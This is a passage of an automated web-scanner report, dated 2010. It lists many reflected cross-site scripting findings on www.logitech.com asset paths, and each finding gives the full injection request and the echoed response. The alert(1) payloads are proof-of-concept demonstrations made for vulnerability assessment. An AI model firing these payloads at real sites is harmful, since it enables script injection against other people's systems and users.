           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c2207</script><script>alert(1)</script>faa6bb4caa8/33048/2' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DC
...[SNIP]...

1.87. http://www.logitech.com/assets/33897/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33897/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86983"><script>alert(1)</script>29194f686f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /86983"><script>alert(1)</script>29194f686f8/33897/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="86983"><script>alert(1)</script>29194f686f8/33897">
...[SNIP]...

1.88. http://www.logitech.com/assets/33897/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33897/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e93</script><script>alert(1)</script>a23b9d258c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d7e93</script><script>alert(1)</script>a23b9d258c7/33897/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','d7e93</script><script>alert(1)</script>a23b9d258c7/33897' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.89. http://www.logitech.com/assets/33900/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33900/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fcfb</script><script>alert(1)</script>eb04cae4f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2fcfb</script><script>alert(1)</script>eb04cae4f34/33900/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','2fcfb</script><script>alert(1)</script>eb04cae4f34/33900' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.90. http://www.logitech.com/assets/33900/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33900/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb57a"><script>alert(1)</script>cd222b0b38d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eb57a"><script>alert(1)</script>cd222b0b38d/33900/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="eb57a"><script>alert(1)</script>cd222b0b38d/33900">
...[SNIP]...

1.91. http://www.logitech.com/assets/33903/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33903/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33fb8"><script>alert(1)</script>4e64bd8aed4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /33fb8"><script>alert(1)</script>4e64bd8aed4/33903/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="33fb8"><script>alert(1)</script>4e64bd8aed4/33903">
...[SNIP]...

1.92. http://www.logitech.com/assets/33903/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33903/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c7a0</script><script>alert(1)</script>898a08fcb2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c7a0</script><script>alert(1)</script>898a08fcb2c/33903/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','4c7a0</script><script>alert(1)</script>898a08fcb2c/33903' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.93. http://www.logitech.com/assets/34007/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34007/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f88bd</script><script>alert(1)</script>05edf719c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f88bd</script><script>alert(1)</script>05edf719c3b/34007/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f88bd</script><script>alert(1)</script>05edf719c3b/34007' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.94. http://www.logitech.com/assets/34007/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34007/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a148"><script>alert(1)</script>c5b1e6f43aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /8a148"><script>alert(1)</script>c5b1e6f43aa/34007/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="8a148"><script>alert(1)</script>c5b1e6f43aa/34007">
...[SNIP]...

1.95. http://www.logitech.com/assets/34067/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34067/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992ec"><script>alert(1)</script>616f8778c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /992ec"><script>alert(1)</script>616f8778c55/34067/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="992ec"><script>alert(1)</script>616f8778c55/34067">
...[SNIP]...

1.96. http://www.logitech.com/assets/34067/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/34067/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33442</script><script>alert(1)</script>4d901d526b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /33442</script><script>alert(1)</script>4d901d526b7/34067/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','33442</script><script>alert(1)</script>4d901d526b7/34067' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.97. http://www.logitech.com/assets/5848/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/5848/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6376</script><script>alert(1)</script>c9d20560f5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a6376</script><script>alert(1)</script>c9d20560f5f/5848/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','a6376</script><script>alert(1)</script>c9d20560f5f/5848' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.98. http://www.logitech.com/assets/5848/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/5848/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7812"><script>alert(1)</script>98a80d4228f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c7812"><script>alert(1)</script>98a80d4228f/5848/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="c7812"><script>alert(1)</script>98a80d4228f/5848">
...[SNIP]...

1.99. http://www.logitech.com/assets/6277/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/6277/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15419</script><script>alert(1)</script>1c4abb09d95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /15419</script><script>alert(1)</script>1c4abb09d95/6277/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','15419</script><script>alert(1)</script>1c4abb09d95/6277' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.100. http://www.logitech.com/assets/6277/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/6277/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb066"><script>alert(1)</script>73c2f22eb06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eb066"><script>alert(1)</script>73c2f22eb06/6277/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="eb066"><script>alert(1)</script>73c2f22eb06/6277">
...[SNIP]...

1.101. http://www.logitech.com/assets/7167/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/7167/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfa4</script><script>alert(1)</script>bc7c7e40a0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4cfa4</script><script>alert(1)</script>bc7c7e40a0e/7167/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','4cfa4</script><script>alert(1)</script>bc7c7e40a0e/7167' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.102. http://www.logitech.com/assets/7167/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/7167/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806c7"><script>alert(1)</script>c1d6c0950cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /806c7"><script>alert(1)</script>c1d6c0950cc/7167/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="806c7"><script>alert(1)</script>c1d6c0950cc/7167">
...[SNIP]...

1.103. http://www.logitech.com/assets/9653/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/9653/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c82"><script>alert(1)</script>9d1a97b66bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /14c82"><script>alert(1)</script>9d1a97b66bc/9653/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="14c82"><script>alert(1)</script>9d1a97b66bc/9653">
...[SNIP]...

1.104. http://www.logitech.com/assets/9653/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/9653/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777b6</script><script>alert(1)</script>190bc790f22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /777b6</script><script>alert(1)</script>190bc790f22/9653/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
